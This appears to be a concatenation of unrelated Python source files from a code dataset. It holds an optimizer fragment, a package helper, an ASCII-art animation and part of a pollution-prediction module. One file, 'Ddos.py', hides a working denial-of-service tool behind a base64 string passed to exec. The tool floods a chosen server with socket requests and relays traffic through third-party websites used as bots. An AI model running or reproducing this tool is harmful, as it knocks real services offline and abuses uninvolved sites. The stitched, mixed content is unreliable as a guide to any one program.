raise ValueError("Invalid topC value: {}".format(topC))
defaults = dict(lr=lr, weight_decay=weight_decay, betas=betas, kappa=kappa,
dampening=dampening,
aggr=aggr, decay=decay, gradHist={}, topC=topC,
sampling=sampling, critical_test=critical_test)
super(AggMo_C, self).__init__(params, defaults)
self.resetOfflineStats()
self.resetAnalysis()
def getOfflineStats(self):
return self.offline_grad
def getAnalysis(self):
return self.g_analysis
def resetAnalysis(self):
self.g_analysis = {'gt': 0., 'gc': 0., 'count': 0}
def resetOfflineStats(self):
self.offline_grad = {'yes': 0, 'no': 0}
@classmethod
def from_exp_form(cls, params, lr=0.1, a=0.1, k=3, weight_decay=0):
betas = [1 - a ** i for i in range(k)]
return cls(params, lr, betas, weight_decay)
def __setstate__(self, state):
super(AggMo_C, self).__setstate__(state)
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
weight_decay = group['weight_decay']
betas = group['betas']
total_mom = float(len(betas))
dampening = group['dampening']
decay = group['decay']
topc = group['topC']
aggr = group['aggr']
kappa = group['kappa']
total_norm = 0.0
for p in group['params']:
if p.grad is None:
continue
d_p = p.grad.data
total_norm += torch.sqrt(torch.sum(torch.square(d_p)))
for p in group['params']:
if p.grad is None:
continue
d_p = p.grad.data
if weight_decay != 0:
d_p = d_p.add(p.data, alpha=weight_decay)
if kappa != 0:
param_state = self.state[p]
if 'critical gradients' not in param_state:
crit_buf = param_state['critical gradients'] = priorityDict()
crit_buf.setHyper(decay_rate=decay, K=topc)
crit_buf[total_norm] = deepcopy(d_p)
else:
crit_buf = param_state['critical gradients']
aggr_grad = aggregate(d_p, crit_buf, aggr, 1.0)
if crit_buf.isFull():
if total_norm > crit_buf.pokeSmallest():
self.offline_grad['yes'] += 1
crit_buf[total_norm] = deepcopy(d_p)
else:
self.offline_grad['no'] += 1
else:
crit_buf[total_norm] = deepcopy(d_p)
d_p = aggr_grad
self.g_analysis['gc'] += crit_buf.averageTopC()
self.g_analysis['count'] += 1
self.g_analysis['gt'] += p.grad.data.norm()
crit_buf.decay()
if weight_decay != 0:
d_p.add_(p.data, alpha=weight_decay)
param_state = self.state[p]
if 'momentum_buffer' not in param_state:
param_state['momentum_buffer'] = {}
for beta in betas:
param_state['momentum_buffer'][beta] = torch.zeros_like(p.data)
for beta in betas:
buf = param_state['momentum_buffer'][beta]
# import pdb; pdb.set_trace()
buf.mul_(beta).add_(d_p)
p.data.sub_(group['lr'] / total_mom, buf)
return loss
def zero_momentum_buffers(self):
for group in self.param_groups:
betas = group['betas']
for p in group['params']:
param_state = self.state[p]
param_state['momentum_buffer'] = {}
for beta in betas:
param_state['momentum_buffer'][beta] = torch.zeros_like(p.data)
def update_hparam(self, name, value):
for param_group in self.param_groups:
param_group[name] = value
b26e2a3d174a48d87ba5106a60c95f4b2671cbfe | 127 | py | Python | cone_search_plus/setup_package.py | hover2pi/cone_search_plus | 655cf894b201e31ac269e072b98191d4c394e829 | [
"MIT"
] | null | null | null | cone_search_plus/setup_package.py | hover2pi/cone_search_plus | 655cf894b201e31ac269e072b98191d4c394e829 | [
"MIT"
] | null | null | null | cone_search_plus/setup_package.py | hover2pi/cone_search_plus | 655cf894b201e31ac269e072b98191d4c394e829 | [
"MIT"
] | null | null | null | from distutils.extension import Extension
def get_package_data():
return {'cone_search_plus': ['data/*', 'data/radii/*']}
# Ddos.py (B012ED/Ddos, Apache-2.0 license)
# Script By YUSA
# YT B012ED
import base64
import marshal,zlib,base64
#exec(marshal.loads('https://b012ed.github.io')
#zlib&base32&marshal"exec(marshal.load('HgHhbjggTfghUggUgffUhghJhhIbbiGgtGfghHhhuHhjiiBbjjBbhgGggGggTrdFdeSddssGhHhhOjbKinjIjbjIhhhHhggHghhUyggGggggGgggHhGTTTyhhfDdsHjiJiGgjJvvJujGjuHgDdRrgYyyUu')
exec(base64.b64decode('IyEvdXNyL2Jpbi9weXRob24zCiMgLSotIGNvZGluZzogdXRmLTggLSotCgojIHB5dGhvbiAzIERkb3MtQXR0YWNrIFNjcmlwdCB2LjEKIyBieSBCMDEyRUQKIyBvbmx5IGZvciBsZWdhbCBwdXJwb3NlCgppbXBvcnQgb3MsdGltZSxzeXMsc2h1dGlsLGl0ZXJ0b29scyx0aHJlYWRpbmcscmFuZG9tCmZyb20gcXVldWUgaW1wb3J0IFF1ZXVlCmZyb20gb3B0cGFyc2UgaW1wb3J0IE9wdGlvblBhcnNlcgppbXBvcnQgdGltZSxzeXMsc29ja2V0LHRocmVhZGluZyxsb2dnaW5nLHVybGxpYi5yZXF1ZXN0LHJhbmRvbQoKZGVmIHl1c2Eocyk6CiAgICBmb3IgYyBpbiBzICsgJ1xuJzoKICAgICAgICBzeXMuc3Rkb3V0LndyaXRlKGMpCiAgICAgICAgc3lzLnN0ZG91dC5mbHVzaCgpCiAgICAgICAgdGltZS5zbGVlcChyYW5kb20ucmFuZG9tKCkgKiAwLjAxKQp5dXNhKCdpbXBvcnQgZGF0YSBmcm9tIDonKQpkb25lID0gRmFsc2UKCmRlZiBhbmltYXRlKCk6CiAgICBmb3IgYyBpbiBpdGVydG9vbHMuY3ljbGUoWydcMDMzWzM0OzFtfCcsICcvJywgJy0nLCAnXFxcMDMzWzAwbSddKToKICAgICAgICBpZiBkb25lOgogICAgICAgICAgICBicmVhawogICAgICAgIHN5cy5zdGRvdXQud3JpdGUoJ1xybG9hZGluZyAnICsgYykKICAgICAgICBzeXMuc3Rkb3V0LmZsdXNoKCkKICAgICAgICB0aW1lLnNsZWVwKDAuMSkKdCA9IHRocmVhZGluZy5UaHJlYWQodGFyZ2V0PWFuaW1hdGUpCnQuc3RhcnQoKQoKdGltZS5zbGVlcCgxMCkKZG9uZSA9IFRydWUKCnl1c2EoIlxuXDAzM1swMG1cdFwwMzNbNDE7MW0gaHR0cDovL2IwMTJlZC5naXRodWIuaW8gXDAzM1swMG0iKQoKeXVzYSgiIiJcMDMzWzM0OzFtCiAgICDilI/ilJMg4pSP4pSB4pST4pSP4pSB4pST4pSP4pSB4pW44pW64pSz4pST4pK4CiAgICDilKPilLvilJPilIMg4pSD4pSj4pSz4pSb4pSj4pW4ICDilIPilIMgXDAzM1s5NjsxbURkb3NcMDMzWzAwbQogXDAzM1s5NjsxbSAgIOKUl+KUgeKUm+KUl+KUgeKUm+KVueKUl+KVuOKUl+KUgeKVuOKVuuKUu+KUm1wwMzNbMDBtCiBcMDMzWzM0OzFtICAgY29weXJpZ2h0IDIwMjEgXDAzM1s5NjsxbVYxXDAzM1swMG0iIiIpCmRvbmUgPSBGYWxzZQpvcy5zeXN0ZW0oImRhdGUiKQpwcmludCAoIlwwMzNbMTszNG3igKLigKLigKLigKLigKLigKLigKLigKLigKLigKLigKLigKLigKLigKLigKLigKLigKLigKLigKLigKLigKLigKLigKLigKLigKLigKLigKLigKLigKJcbiIpCgpkZWYgdXNlcl9hZ2VudCgpOgoJZ2xvYmFsIHVhZ2VudAoJdWFnZW50PVtdCgl1YWdlbnQuYXBwZW5kKCJNb3ppbGxhLzUuMCAoY29tcGF0aWJsZTsgTVNJRSA5LjA7IFdpbmRvd3MgTlQgNi4wKSBPcGVyYSAxMi4xNCIpCgl1YWdlbnQuYXBwZW5kKCJNb3ppbGxhLzUuMCAoWDExOyBVYnVudHU7IExpbnV4IGk2ODY7IHJ2OjI2LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvMjYuMCIpCgl1YWdlbnQuYXBwZW5kKCJNb3ppbGxhLzUuMCAoWDExOyBVOyBMaW51e
CB4ODZfNjQ7IGVuLVVTOyBydjoxLjkuMS4zKSBHZWNrby8yMDA5MDkxMyBGaXJlZm94LzMuNS4zIikKCXVhZ2VudC5hcHBlbmQoIk1vemlsbGEvNS4wIChXaW5kb3dzOyBVOyBXaW5kb3dzIE5UIDYuMTsgZW47IHJ2OjEuOS4xLjMpIEdlY2tvLzIwMDkwODI0IEZpcmVmb3gvMy41LjMgKC5ORVQgQ0xSIDMuNS4zMDcyOSkiKQoJdWFnZW50LmFwcGVuZCgiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4yKSBBcHBsZVdlYktpdC81MzUuNyAoS0hUTUwsIGxpa2UgR2Vja28pIENvbW9kb19EcmFnb24vMTYuMS4xLjAgQ2hyb21lLzE2LjAuOTEyLjYzIFNhZmFyaS81MzUuNyIpCgl1YWdlbnQuYXBwZW5kKCJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA1LjI7IGVuLVVTOyBydjoxLjkuMS4zKSBHZWNrby8yMDA5MDgyNCBGaXJlZm94LzMuNS4zICguTkVUIENMUiAzLjUuMzA3MjkpIikKCXVhZ2VudC5hcHBlbmQoIk1vemlsbGEvNS4wIChXaW5kb3dzOyBVOyBXaW5kb3dzIE5UIDYuMTsgZW4tVVM7IHJ2OjEuOS4xLjEpIEdlY2tvLzIwMDkwNzE4IEZpcmVmb3gvMy41LjEiKQoJcmV0dXJuKHVhZ2VudCkKCgpkZWYgbXlfYm90cygpOgoJZ2xvYmFsIGJvdHMKCWJvdHM9W10KCWJvdHMuYXBwZW5kKCJodHRwOi8vZXNzZW50aWFsdG91cnMuY29tL2NoZWNrP3VybD0iKQoJYm90cy5hcHBlbmQoImh0dHA6Ly9zYXZhbmFjbG91ZC5jb20vIikKCXJldHVybihib3RzKQoKCmRlZiBib3RfRGRvcyh1cmwpOgoJdHJ5OgoJCXdoaWxlIFRydWU6CgkJCXJlcSA9IHVybGxpYi5yZXF1ZXN0LnVybG9wZW4odXJsbGliLnJlcXVlc3QuUmVxdWVzdCh1cmwsaGVhZGVycz17J1VzZXItQWdlbnQnOiByYW5kb20uY2hvaWNlKHVhZ2VudCl9KSkKCQkJcHJpbnQoIlwwMzNbOTRtYm90IGlzIGF0dGFjay4uLlwwMzNbMG0iKQoJCQl0aW1lLnNsZWVwKC4xKQoJZXhjZXB0OgoJCXRpbWUuc2xlZXAoLjEpCgoKZGVmIGRvd25faXQoaXRlbSk6Cgl0cnk6CgkJd2hpbGUgVHJ1ZToKCQkJcGFja2V0ID0gc3RyKCJHRVQgLyBIVFRQLzEuMVxuSG9zdDogIitob3N0KyJcblxuIFVzZXItQWdlbnQ6ICIrcmFuZG9tLmNob2ljZSh1YWdlbnQpKyJcbiIrZGF0YSkuZW5jb2RlKCd1dGYtOCcpCgkJCXMgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pCgkJCXMuY29ubmVjdCgoaG9zdCxpbnQocG9ydCkpKQoJCQlpZiBzLnNlbmR0byggcGFja2V0LCAoaG9zdCwgaW50KHBvcnQpKSApOgoJCQkJcy5zaHV0ZG93bigxKQoJCQkJcHJpbnQgKCJcMDMzWzk3bSIsdGltZS5jdGltZSh0aW1lLnRpbWUoKSksIlwwMzNbMG0gXDAzM1s5NG0uL0Rkb3MtQXR0YWNrIFwwMzNbMG0iKQoJCQllbHNlOgoJCQkJcy5zaHV0ZG93bigxKQoJCQkJcHJpbnQoIlwwMzNbOTFtIFNodXREb3duXDAzM1swbSIpCgkJCXRpbWUuc2xlZXAoLjEpCglleGNlcHQgc29ja2V0LmVycm9yIGFzIGU6CgkJcHJpbnQoIlwwMzNbOTFtTm8gQ29ubmVjdGlvbiEgU2VydmVyR
G93blwwMzNbMG0iKQoJCSNwcmludCgiXDAzM1s5MW0iLGUsIlwwMzNbMG0iKQoJCXRpbWUuc2xlZXAoLjEpCgoKZGVmIGRvcygpOgoJd2hpbGUgVHJ1ZToKCQlpdGVtID0gcS5nZXQoKQoJCWRvd25faXQoaXRlbSkKCQlxLnRhc2tfZG9uZSgpCgoKZGVmIGRvczIoKToKCXdoaWxlIFRydWU6CgkJaXRlbT13LmdldCgpCgkJYm90X0Rkb3MocmFuZG9tLmNob2ljZShib3RzKSsiaHR0cDovLyIraG9zdCkKCQl3LnRhc2tfZG9uZSgpCgoKZGVmIHVzYWdlKCk6Cgl5dXNhKCcnJ1wwMzNbMTs5Nm3igKJcMDMzWzE7MzRtIEREb3MtQXR0YWNrIFNjcmlwdCB2LjEgaHR0cDovL2IwMTJlZC5naXRodWIuaW8KXDAzM1sxOzk2beKAoiBcMDMzWzE7MzRtRG9uJ3QgYWJ1c2UgQWxsIHJpc2tzIGFyZSBib3JuZSBieSB0aGUgdXNlci4KXDAzM1sxOzk2beKAoiBcMDMzWzE7MzRtSXQgaXMganVzdCBmb3Igc2VydmVyIHRlc3Rpbmcgc2NyaXB0LiBZb3VyIGlwIGlzIHZpc2libGUuIFxuClwwMzNbMTs5Nm3igKJcMDMzWzE7MzRtIHVzYWdlIDogcHl0aG9uMyBEZG9zLnB5IFstc10gWy1wXSBbLXRdCiAgIFstaF0gOiBoZWxwCiAgIFstc10gOiBzZXJ2ZXIgaXAKICAgWy1wXSA6IHBvcnQgZGVmYXVsdCA4MAogICBbLXRdIDogdHVyYm8gZGVmYXVsdCAxMzUgXG5cMDMzWzBtJycnKQoJc3lzLmV4aXQoKQoKCmRlZiBnZXRfcGFyYW1ldGVycygpOgoJZ2xvYmFsIGhvc3QKCWdsb2JhbCBwb3J0CglnbG9iYWwgdGhyCglnbG9iYWwgaXRlbQoJb3B0cCA9IE9wdGlvblBhcnNlcihhZGRfaGVscF9vcHRpb249RmFsc2UsZXBpbG9nPSJEZG9zIikKCW9wdHAuYWRkX29wdGlvbigiLXEiLCItLXF1aWV0IiwgaGVscD0ic2V0IGxvZ2dpbmcgdG8gRVJST1IiLGFjdGlvbj0ic3RvcmVfY29uc3QiLCBkZXN0PSJsb2dsZXZlbCIsY29uc3Q9bG9nZ2luZy5FUlJPUiwgZGVmYXVsdD1sb2dnaW5nLklORk8pCglvcHRwLmFkZF9vcHRpb24oIi1zIiwiLS1zZXJ2ZXIiLCBkZXN0PSJob3N0IixoZWxwPSJhdHRhY2sgdG8gc2VydmVyIGlwIC1zIGlwIikKCW9wdHAuYWRkX29wdGlvbigiLXAiLCItLXBvcnQiLHR5cGU9ImludCIsZGVzdD0icG9ydCIsaGVscD0iLXAgODAgZGVmYXVsdCA4MCIpCglvcHRwLmFkZF9vcHRpb24oIi10IiwiLS10dXJibyIsdHlwZT0iaW50IixkZXN0PSJ0dXJibyIsaGVscD0iZGVmYXVsdCAxMzUgLXQgMTM1IikKCW9wdHAuYWRkX29wdGlvbigiLWgiLCItLWhlbHAiLGRlc3Q9ImhlbHAiLGFjdGlvbj0nc3RvcmVfdHJ1ZScsaGVscD0iaGVscCB5b3UiKQoJb3B0cywgYXJncyA9IG9wdHAucGFyc2VfYXJncygpCglsb2dnaW5nLmJhc2ljQ29uZmlnKGxldmVsPW9wdHMubG9nbGV2ZWwsZm9ybWF0PSclKGxldmVsbmFtZSktOHMgJShtZXNzYWdlKXMnKQoJaWYgb3B0cy5oZWxwOgoJCXVzYWdlKCkKCWlmIG9wdHMuaG9zdCBpcyBub3QgTm9uZToKCQlob3N0ID0gb3B0cy5ob3N0CgllbHNlOgoJCXVzYWdlKCkKCWlmIG9wdHMucG9ydCBpcyBOb25lOgoJCXBvcnQgPSA4M
AoJZWxzZToKCQlwb3J0ID0gb3B0cy5wb3J0CglpZiBvcHRzLnR1cmJvIGlzIE5vbmU6CgkJdGhyID0gMTM1CgllbHNlOgoJCXRociA9IG9wdHMudHVyYm8KCgojIHJlYWRpbmcgaGVhZGVycwpnbG9iYWwgZGF0YQpoZWFkZXJzID0gb3BlbigiaGVhZGVycy50eHQiLCAiciIpCmRhdGEgPSBoZWFkZXJzLnJlYWQoKQpoZWFkZXJzLmNsb3NlKCkKI3Rhc2sgcXVldWUgYXJlIHEsdwpxID0gUXVldWUoKQp3ID0gUXVldWUoKQoKCmlmIF9fbmFtZV9fID09ICdfX21haW5fXyc6CglpZiBsZW4oc3lzLmFyZ3YpIDwgMjoKCQl1c2FnZSgpCglnZXRfcGFyYW1ldGVycygpCglwcmludCgiXDAzM1s5Nm0iLGhvc3QsIiBwb3J0OiAiLHN0cihwb3J0KSwiIHR1cmJvOiAiLHN0cih0aHIpLCJcMDMzWzBtXG4iKQoJeXVzYSgiXDAzM1s5NG1QbGVhc2Ugd2FpdC4uLlwwMzNbMG0iKQoJdXNlcl9hZ2VudCgpCglteV9ib3RzKCkKCXRpbWUuc2xlZXAoNSkKCXRyeToKCQlzID0gc29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCwgc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoaG9zdCxpbnQocG9ydCkpKQoJCXMuc2V0dGltZW91dCgxKQoJZXhjZXB0IHNvY2tldC5lcnJvciBhcyBlOgoJCXl1c2EoIlwwMzNbOTFtY2hlY2sgc2VydmVyIGlwIGFuZCBwb3J0XDAzM1swbSIpCgkJdXNhZ2UoKQoJd2hpbGUgVHJ1ZToKCQlmb3IgaSBpbiByYW5nZShpbnQodGhyKSk6CgkJCXQgPSB0aHJlYWRpbmcuVGhyZWFkKHRhcmdldD1kb3MpCgkJCXQuZGFlbW9uID0gVHJ1ZSAgIyBpZiB0aHJlYWQgaXMgZXhpc3QsIGl0IGRpZXMKCQkJdC5zdGFydCgpCgkJCXQyID0gdGhyZWFkaW5nLlRocmVhZCh0YXJnZXQ9ZG9zMikKCQkJdDIuZGFlbW9uID0gVHJ1ZSAgIyBpZiB0aHJlYWQgaXMgZXhpc3QsIGl0IGRpZXMKCQkJdDIuc3RhcnQoKQoJCXN0YXJ0ID0gdGltZS50aW1lKCkKCQkjdGFza2luZwoJCWl0ZW0gPSAwCgkJd2hpbGUgVHJ1ZToKCQkJaWYgKGl0ZW0+MTgwMCk6ICMgZm9yIG5vIG1lbW9yeSBjcmFzaAoJCQkJaXRlbT0wCgkJCQl0aW1lLnNsZWVwKC4xKQoJCQlpdGVtID0gaXRlbSArIDEKCQkJcS5wdXQoaXRlbSkKCQkJdy5wdXQoaXRlbSkKCQlxLmpvaW4oKQoJCXcuam9pbigpCg==')) | 26.735974 | 7,490 | 0.956425 | 38 | 8,101 | 203.894737 | 0.710526 | 0.002839 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.103054 | 0.038143 | 8,101 | 303 | 7,490 | 26.735974 | 0.891299 | 0.032712 | 0 | 0 | 0 | 0 | 0.953013 | 0.953013 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.666667 | 0 | 0.666667 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
# File: Krogg/Massacre.py (repo: wang0618/ascii-art, license: MIT)
# https://web.archive.org/web/20000528131158/http://gtcom.net/~krogg/ascii/MASSCR.HTM
# The Massacre
# By:Krogg
duration = 350
name = "The Massacre"
frames = [
" The Massacre /// \r\n"+
" /// /oo \r\n"+
" /OO | > \r\n"+
" | > [,= \r\n"+
" [,= |\\\\ \r\n"+
" | \\\\ ||\\\\ \r\n"+
" ||\\\\ ( )\\\\\r\n"+
" ( )=+==-- |\\\\ \r\n"+
" |\\\\ ||\\\\ \r\n"+
" ||\\\\ //|| \r",
" -h- Mas-ac-e /// \r\n"+
" /// /-o \r\n"+
" /OO | > \r\n"+
" | > [,= \r\n"+
" [,= |\\\\ \r\n"+
" | \\\\ ||\\\\ \r\n"+
" ||\\\\ ( )\\\\\r\n"+
" ( )=+==-- |\\\\ \r\n"+
" |\\\\ ||\\\\ \r\n"+
" |||| //|| \r",
" _-_ M-s_a-_- /// \r\n"+
" /// /oo \r\n"+
" /OO | > \r\n"+
" | > [,= \r\n"+
" [,= [\\\\ \r\n"+
" | \\\\ |// \r\n"+
" ||\\\\ //) \r\n"+
" ( )=+==-- |\\\\ \r\n"+
" || ||\\\\ \r\n"+
" || //|| \r",
" _-_ M-s_a-_- /// \r\n"+
" /// /oo \r\n"+
" /O- | > \r\n"+
" | > [,= \r\n"+
" [ ,= [\\\\ \r\n"+
" | \\\\ |// \r\n"+
" ||\\\\ //) \r\n"+
" ( )=+==-- |\\\\ \r\n"+
" ||\\ ||\\\\ \r\n"+
" //| //|| \r",
" _ - - - /// \r\n"+
" /// /oo \r\n"+
" /OO | > \r\n"+
" | > [,= \r\n"+
" [,,= / [\\\\ \r\n"+
" |\\\\\\ / |// \r\n"+
" ||\\\\% //) \r\n"+
" ( )/ |\\\\ \r\n"+
" ||\\ ||\\\\ \r\n"+
" ||\\\\ //|| \r",
" /// \r\n"+
" /// /o- \r\n"+
" /OO /| > \r\n"+
" | > / [,= \r\n"+
" [,,= % [\\\\ \r\n"+
" |\\===/ |// \r\n"+
" || //) \r\n"+
" ( ) |\\\\ \r\n"+
" ||\\ ||\\\\ \r\n"+
" ||| //|| \r",
" | /// \r\n"+
" /// | /oo \r\n"+
" /oo | | > \r\n"+
" | > | [,= \r\n"+
" [,`= + [\\\\ \r\n"+
" |\\===| |// \r\n"+
" || //) \r\n"+
" ( ) |\\\\ \r\n"+
" ||\\ ||\\\\ \r\n"+
" ||| //|| \r",
" | /// \r\n"+
" /// | /oo \r\n"+
" /oo | | > \r\n"+
" | > | [,= \r\n"+
" [,`= + [\\\\ \r\n"+
" |\\===| |// \r\n"+
" || //) \r\n"+
" ( ) |\\\\ \r\n"+
" ||\\ ||\\\\ \r\n"+
" ||| //|| \r",
" | /// \r\n"+
" /// | /Oo \r\n"+
" /oo | | > \r\n"+
" | > | [,= \r\n"+
" [,,= + [\\\\ \r\n"+
" |\\===| |// \r\n"+
" || //) \r\n"+
" ( ) |\\\\ \r\n"+
" ||\\ ||\\\\ \r\n"+
" ||| //|| \r",
" \\// \r\n"+
" /// /OO \r\n"+
" /oo /| > \r\n"+
" | > / [,o \r\n"+
" [,`= % [\\\\ \r\n"+
" |\\===/ |// \r\n"+
" || //) \r\n"+
" ( ) |\\\\ \r\n"+
" ||\\ ||\\\\ \r\n"+
" ||| //|| \r",
" \\// \r\n"+
" /// OO \r\n"+
" /oo | > \r\n"+
" | > [,O \r\n"+
" [,`= [\\\\ \r\n"+
" | ===+==---- \r\n"+
" || //) \r\n"+
" ( ) |\\\\ \r\n"+
" ||\\ ||\\\\ \r\n"+
" ||| //|| \r",
" \\// \r\n"+
" /// oo \r\n"+
" /oo | > \r\n"+
" | > [,o \r\n"+
" [,`= [\\\\ \r\n"+
" | ===\\ |// \r\n"+
" || % //) \r\n"+
" ( ) \\ |\\\\ \r\n"+
" ||\\ \\||\\\\ \r\n"+
" ||| //|| \r",
" \\// \r\n"+
" /// Oo \r\n"+
" /-- | > \r\n"+
" | > [,o \r\n"+
" [,`= //\\ \r\n"+
" | ===| // /\\ \r\n"+
" || + //| )\\\\\r\n"+
" ( ) | |\\\\ \r\n"+
" ||\\ | // \\\\ \r\n"+
" ||| | // || \r",
" \\// \r\n"+
" /// oO \r\n"+
" /-o | > \r\n"+
" | > [,o \r\n"+
" [,`= \r\n"+
" | ===/ \r\n"+
" || % __\r\n"+
" ( / /\\__\r\n"+
" /\\ //|| \r\n"+
" /|| //// \r",
" \\// \r\n"+
" /// Oo \r\n"+
" /oo | > \r\n"+
" | > [,o \r\n"+
" [,`= \r\n"+
" | === \r\n"+
" --==+= \r\n"+
" ( ) ______\r\n"+
" ||\\ / ___\r\n"+
" ||| // // \r",
" \\// \r\n"+
" /// xx \r\n"+
" /oo | > \r\n"+
" | > [,o \r\n"+
" [,`= \r\n"+
" | \\\\ \r\n"+
" --==+\\\\= \r\n"+
" ( ) \r\n"+
" ||\\ ______\r\n"+
" ||| /#--####\r",
" \r\n"+
" /// \\// \r\n"+
" /oo |xx \r\n"+
" | > | > \r\n"+
" [,`= [.= \r\n"+
" | \\\\ \r\n"+
" --==+\\\\= \r\n"+
" ( ) \r\n"+
" ||\\ ______\r\n"+
" ||| /#--####\r",
" \r\n"+
" /// \r\n"+
" /oo \r\n"+
" | > \\// \r\n"+
" [,`= |xx \r\n"+
" | \\\\ | > \r\n"+
" --==+\\\\= [.- \r\n"+
" ( ) \r\n"+
" ||\\ ______\r\n"+
" ||| /#--####\r",
" \r\n"+
" /// \r\n"+
" /oo \r\n"+
" | > \r\n"+
" [,`\< \r\n"+
" | \\\\ \\\\\\ \r\n"+
" --==+\\\\= |xx \r\n"+
" ( ) | > \r\n"+
" ||\\ __[.-__\r\n"+
" ||| //#--####\r",
" \r\n"+
" /// \r\n"+
" /oo ha \r\n"+
" | > / OO \r\n"+
" [,`\< > \r\n"+
" | \\\\ \\\\\\ \r\n"+
" --==+\\\\= |xx \r\n"+
" ( ) | > \r\n"+
" ||\\ __[.-__\r\n"+
" ||| //#--####\r",
" \r\n"+
" /// \r\n"+
" /oo ha OO \r\n"+
" | > ha > \r\n"+
" [,`\<--ha \r\n"+
" | \\\\ \\\\\\ \r\n"+
" --==+\\\\= |xx \r\n"+
" ( ) | > \r\n"+
" ||\\ __[.-__\r\n"+
" ||| //#--####\r",
" \r\n"+
" /// OO \r\n"+
" /oo > \r\n"+
" | > \r\n"+
" [,`\< \r\n"+
" | \\\\ \\ ha\\\\\\ \r\n"+
" --==+\\\\=ha |xx \r\n"+
" ( ) | > \r\n"+
" ||\\ __[.-__\r\n"+
" ||| //#--####\r",
" OO\r\n"+
" /// >\r\n"+
" /oo your \r\n"+
" | > / \r\n"+
" [,`\< \r\n"+
" | \\\\ \\\\\\ \r\n"+
" --==+\\\\= |xx \r\n"+
" ( ) | > \r\n"+
" ||\\ __[.-__\r\n"+
" ||| //#--####\r",
" OO\r\n"+
" /// \< \r\n"+
" /oo your \r\n"+
" | > / DEAD \r\n"+
" [,`\< \r\n"+
" | \\\\ \\\\\\ \r\n"+
" --==+\\\\= |xx \r\n"+
" ( ) | > \r\n"+
" ||\\ __[.-__\r\n"+
" ||| //#--####\r",
" --\r\n"+
" /// \< \r\n"+
" /oo your \r\n"+
" | > / DEAD \r\n"+
" [,`\< \r\n"+
" | \\\\ \\\\\\ \r\n"+
" --==+\\\\= |xx \r\n"+
" ( ) | > \r\n"+
" ||\\ __[.-__\r\n"+
" ||| //#--####\r",
" oo\r\n"+
" /// \< \r\n"+
" /oo \r\n"+
" | > \r\n"+
" [,`= \r\n"+
" | \\\\ \\\\\\ \r\n"+
" --==+\\\\= |xx \r\n"+
" ( ) | > \r\n"+
" ||\\ __[.-__\r\n"+
" ||| //#--####\r",
" \r\n"+
" \r\n"+
" \r\n"+
" H E D \r\n"+
" \r\n"+
" T E N \r\n"+
" \r\n"+
" \r\n"+
" \r\n"+
" \r",
" \r\n"+
" \r\n"+
" \r\n"+
" \r\n"+
" THE END \r\n"+
" \r\n"+
" \r\n"+
" \r\n"+
" \r\n"+
" \r",
" \r\n"+
" \r\n"+
" \r\n"+
" \r\n"+
" THE END \r\n"+
" \r\n"+
" \r\n"+
" \r\n"+
" \r\n"+
" \r"
]
#!/usr/bin/env python
# File: ML/PredictModul/Polution_modul.py (repo: chigwell/msk-ecology, license: MIT)
# coding: utf-8
# import all libraries needed
import numpy as np
import pandas as pd
import pickle
from sklearn.preprocessing import StandardScaler
from sklearn.base import BaseEstimator, TransformerMixin
from sklearn.utils import shuffle
# create the Custom Scaler class
class CustomScaler(BaseEstimator,TransformerMixin):
# init or what information we need to declare a CustomScaler object
# and what is calculated/declared
def __init__(self,columns):
# scaler is nothing but a Standard Scaler object
self.scaler = StandardScaler()
# with some columns 'twist'
self.columns = columns
self.mean_ = None
self.var_ = None
    # the fit method, which is again based on StandardScaler
def fit(self, X, y=None):
self.scaler.fit(X[self.columns], y)
self.mean_ = np.mean(X[self.columns])
self.var_ = np.var(X[self.columns])
return self
# the transform method which does the actual scaling
def transform(self, X, y=None, copy=None):
# record the initial order of the columns
init_col_order = X.columns
# scale all features that you chose when creating the instance of the class
X_scaled = pd.DataFrame(self.scaler.transform(X[self.columns]), columns=self.columns)
# declare a variable containing all information that was not scaled
X_not_scaled = X.loc[:,~X.columns.isin(self.columns)]
# return a data frame which contains all scaled features and all 'not scaled' features
# use the original order (that you recorded in the beginning)
return pd.concat([X_not_scaled, X_scaled], axis=1)[init_col_order]
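The pattern CustomScaler wraps can be seen in isolation: fit a StandardScaler on a column subset, transform it, and reassemble the frame in the original column order. A minimal self-contained sketch (the toy column names and values are made up for illustration):

```python
import pandas as pd
from sklearn.preprocessing import StandardScaler

# Scale only the selected numeric columns, leave the dummy column untouched,
# and restore the original column order.
df = pd.DataFrame({'traffic': [10.0, 20.0, 30.0],
                   'humidity': [40.0, 50.0, 60.0],
                   'is_weekend': [0, 1, 0]})
cols = ['traffic', 'humidity']
scaler = StandardScaler().fit(df[cols])
scaled = pd.DataFrame(scaler.transform(df[cols]), columns=cols)
result = pd.concat([df.drop(columns=cols), scaled], axis=1)[df.columns]
```

Scaling only a subset matters here because the dummy (one-hot) station columns would lose their 0/1 meaning if standardized.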
# create the special class for CO pollution that we are going to use from here on to predict new data
class polution_CO_model():
    def __init__(self, model_file='model_CO', scaler_file='scaler'):
        # read the saved 'model' and 'scaler' files; use the arguments (with the
        # original file names as defaults) instead of hard-coded paths
        with open(model_file, 'rb') as m_file, open(scaler_file, 'rb') as s_file:
            self.reg = pickle.load(m_file)
            self.scaler = pickle.load(s_file)
self.data = None
# take a data file (*.csv) and preprocess it
def load_and_clean_data(self, data_file):
# import the data
user_data = pd.read_csv(data_file,delimiter=',')
df=user_data
# store the data in a new variable for later use
self.df_with_predictions = df.copy()
#transform data into datetime type
df['date']=pd.to_datetime(df['date'])
# create list of month represented by number(from 1 to 12) and add it to data
list_months=[]
